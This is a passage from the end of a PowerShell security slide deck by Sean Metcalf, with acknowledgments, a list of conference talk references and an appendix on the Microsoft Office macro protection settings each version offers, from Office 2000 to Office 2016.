• Lee Christensen (@tifkin_)
• Lee Holmes (@lee_holmes)
• Matt Graeber (@mattifestation)
• Matt Nelson (@enigma0x3)
• Matthew Dunwoody (@matthewdunwoody)
• Will Harmjoy (@Harmj0y)
CONTACT: Sean Metcalf (@Pyrotek3)
s e a n [@] TrimarcSecurity.com
www.ADSecurity.org
TrimarcSecurity.com
Slides: Presentations.ADSecurity.org
References
• DEF CON 18 – Dave Kennedy & Josh Kelly – PowerShell OMFG! https://www.youtube.com/watch?v=CmmcpSsAbaM
• DEF CON 21 – Joe Bialek – PowerPwning: Post-Exploiting By Overpowering PS https://www.defcon.org/images/defcon-21/dc-21-presentations/Bialek/DEFCON-21-Bialek-PowerPwning-Post-Exploiting-by-Overpowering-Powershell.pdf
• PowerShell Empire http://PowerShellEmpire.com
• DerbyCon 6 (2016) Ben Ten (Ben0xA) – PowerShell Secrets and Tactics https://www.youtube.com/watch?v=mPPv6_adTyg
• DerbyCon 6 (2016) Daniel Bohannon – Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To) D””e`Tec`T ‘Th’+’em’ https://www.youtube.com/watch?v=P1lkflnWb0I
• PowerShell Loves the Blue Team – PowerShell v5 features http://blogs.msdn.com/b/powershell/archive/2015/06/09/powershell-the-blue-team.aspx
• ADSecurity.org
And there’s more! (just not now)
Microsoft Office Security in the “appendix”
Appendix
Microsoft Office Macro Security
Macro Protection by Microsoft Office Version
• Microsoft Office 2000
  • Low
  • Medium
  • High
• Microsoft Office 2003
  • Low
  • Medium
  • High
  • Very High
Macro Protection by Microsoft Office Version
• Microsoft Office 2007 (Trust Center)
  • Office 2007 New Macro Security Options
    • Disable all macros without notification
    • Disable all macros with notification
    • Disable all macros except digitally signed macros
    • Enable all macros (not recommended, potentially dangerous code can run)
    • Trust access to the VBA project object model
• Microsoft Office 2010
  • By default, VBA is enabled & trusted VBA macros are allowed to run.
  • Trusted Locations
  • Trusted Publishers
  • Office Protected View
Microsoft Office Protected View (2010)
• Files from risky locations (Internet) are opened in Protected View.
• MOICE (Microsoft Office Isolated Converter Environment).
• MOICE takes a potentially risky binary file type, converts it within a sandboxed process to the new XML format, then back to the binary format, and opens it.
• Purpose is to remove any exploit code that was hidden away within the file.
Macro Protection by Microsoft Office Version
• Microsoft Office 2013 Telemetry Dashboard
  • Determine macro usage
  • Disabled by default
  • Enabled by using Group Policy, registry settings, or by selecting the Enable Logging button in Telemetry Log
  • https://technet.microsoft.com/en-us/library/jj863580.aspx
  • https://blogs.technet.microsoft.com/office_resource_kit/2012/08/08/using-office-telemetry-dashboard-to-see-how-well-your-office-solutions-perform-in-office-2013/
• Microsoft Office 2016
  • Block macros in files originating from the Internet and external email systems (now back-ported to Office 2013)
Office 2013 Telemetry Dashboard
https://blogs.technet.microsoft.com/office_resource_kit/2012/08/08/using-office-telemetry-dashboard-to-see-how-well-your-office-solutions-perform-in-office-2013/
Contact Info
Twitter: @Pyrotek3
Email: sean/@\adsecurity.org, sean/@\trimarcsecurity.com
Company Info: TrimarcSecurity.com
AD Security Info: www.ADSecurity.org